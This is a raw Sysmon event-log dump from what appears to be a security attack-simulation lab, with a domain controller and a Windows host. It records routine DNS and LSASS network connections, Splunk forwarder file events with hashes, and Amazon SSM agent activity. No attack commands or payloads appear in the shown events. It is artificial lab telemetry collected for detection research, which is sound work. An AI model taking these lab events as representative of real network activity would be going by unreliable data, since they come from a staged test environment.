AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59987- 354300x8000000000000000287474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.169{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local55921- 354300x8000000000000000287473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.167{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60356- 354300x8000000000000000287472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.165{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58705- 354300x8000000000000000287471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.163{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local56158- 354300x8000000000000000287470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.159{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57362- 354300x8000000000000000287469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.157{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local60029- 354300x8000000000000000287468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.154{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51128- 354300x8000000000000000287467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.153{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local57229- 354300x8000000000000000287466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.150{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57646- 354300x8000000000000000287465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.147{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local52758- 354300x8000000000000000287464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.146{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56421- 354300x8000000000000000287463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.144{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local51007- 354300x8000000000000000287462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.142{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local52476- 354300x8000000000000000287461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.140{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local52488- 354300x8000000000000000287460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.139{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51587- 354300x8000000000000000287459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.137{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51106- 354300x8000000000000000287458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.135{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local56069- 354300x8000000000000000287457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.134{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50751- 354300x8000000000000000287456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.133{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local55791- 354300x8000000000000000287455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.131{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61097- 354300x8000000000000000287454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.130{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59418- 354300x8000000000000000287453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.129{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50900- 354300x8000000000000000287452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.128{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65535- 354300x8000000000000000287451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.127{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57480- 354300x8000000000000000287450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.126{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local57820- 354300x8000000000000000287449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.125{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58954- 354300x8000000000000000287448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.123{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local61949- 354300x8000000000000000287447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.122{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53017- 354300x8000000000000000287446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.119{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58155- 354300x8000000000000000287445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.118{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local65535- 354300x8000000000000000287444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.116{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local60968- 354300x8000000000000000287443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.116{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local60968-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000287442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.113{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61667- 354300x8000000000000000287441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.113{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61667-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000287440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.102{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53419-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49666- 354300x8000000000000000287439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.102{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53419-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49666- 23542300x8000000000000000287438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:06.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461330C754DFB491D9518C5169600F87,SHA256=D6B2E1F570BC4AF0364C848D4BFAFD23DCA3BF87509B78E730CE36F0D5473285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:07.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F22D2A65AA1C0A4808023932D6A29FA5,SHA256=6CC31FF2A275EA05B8F14C9A9A15E25E12305080C26E660516E55E7FF5BCDAF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:07.894{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDA2861041DFE705E5AB580DE6BF668,SHA256=DE5B5017DD3787D746661794368B6EADC41EA6BB7E63E576B8485A46DE34D53A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:06.664{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53420-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:08.925{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA95C0FC0B3EDB161A44B59240DF484,SHA256=37B1A1CCC9100E33552AA083BC2CA5E98D4639EAF3C13864165EF2120140743C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:05.554{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51321-false10.0.1.12-8000- 23542300x8000000000000000287488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:09.941{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A866D12BDDBE942E20FB794082F13CCF,SHA256=90F1155F572A78A424709329B215E777E7575BEBE30A776ED73672D8AABB649D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:09.066{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C32C8B74E52452012A30E97CAD484FD9,SHA256=A5655B385B3CB13BF86FF6F3F83734A77CF7346710BAA42D7CC20BC3FA9C7B1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:10.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41A679AB68AE4CC56F1907E89660E7D0,SHA256=9E4462F3863956C3CFB14FA6B2AB466CA70D5DB35EDC07763DA358755B3F31B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:10.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB23C66E938AEFE490F0D94491CDB4E,SHA256=AA5C4B5FB1E58C5426D2ABDB59230912AC722B885AA5A856CDE6822FC4A95FF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:11.972{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8EBD69A9D28E344CC747C23E569988B,SHA256=E900DE11D80C9FF30E1A1F883A683D99B6315D6817DE7BFC892A404FA340D7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:11.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F4C79116A1BBD85D9B6706EAA27BB0B,SHA256=C12892DBABC027F8D364E9F8549EF55DABB3C4E632E4C8F33C1F60063DFADAB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:12.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC115D6FF822B301594F49320C0AF36,SHA256=E7DE2B562418C3E9E5520ABEBA9C06241CC63DBAC66E64655F9A8ED84D8C2E67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:13.915{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-132MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:13.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8243B6D9D472B763678A6B6515577545,SHA256=A3A8DF77527A246EFCFBB8CF0EC183187A735F6E08D95528F6F78691F4672B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:13.441{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B93A82704C2DDDF1F21A3FF7CAE4317,SHA256=799DB9A74300B467B89E53FD45E60BCC6129ECA95378EB3D0C219A578F23FD29,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:10.632{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51322-false10.0.1.12-8000- 23542300x8000000000000000216387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:14.441{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580C721144C3EDEBB080C19879DF0793,SHA256=3A6219514B556DE1FE3340419A98EE85A0BDA6E1BDF02D08F4F2777E6E65A336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:14.913{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-133MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:14.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF97BCA7F8275A55CF18BDE704584308,SHA256=D0E514756B5A2278E529FC82BFC19141B0E42DD7803638628815E6F13713989D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:15.659{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7AEB13CCF03DB98180122B0D4BFDF5,SHA256=86AF9A01CA403F752CB428E72B2AC6C69A809D9E77EB45F17B30F1E4FA9B426D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:15.285{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E5B58A9D57101C9A962E0ACE90C252A,SHA256=F516C204AE9CC1095ECF14A73193822092639DC2C3EF58046FD0DE8296279485,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:12.695{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53421-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:16.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD0E953340621B4D623F084A66AE73BA,SHA256=BF99DBBB5412BC0D749B1EBC260271C491EDB21FE9C6F7E91DB74A8B7D5E6DAA,IMPHASH=00000000000000000000000000000000falsetrue 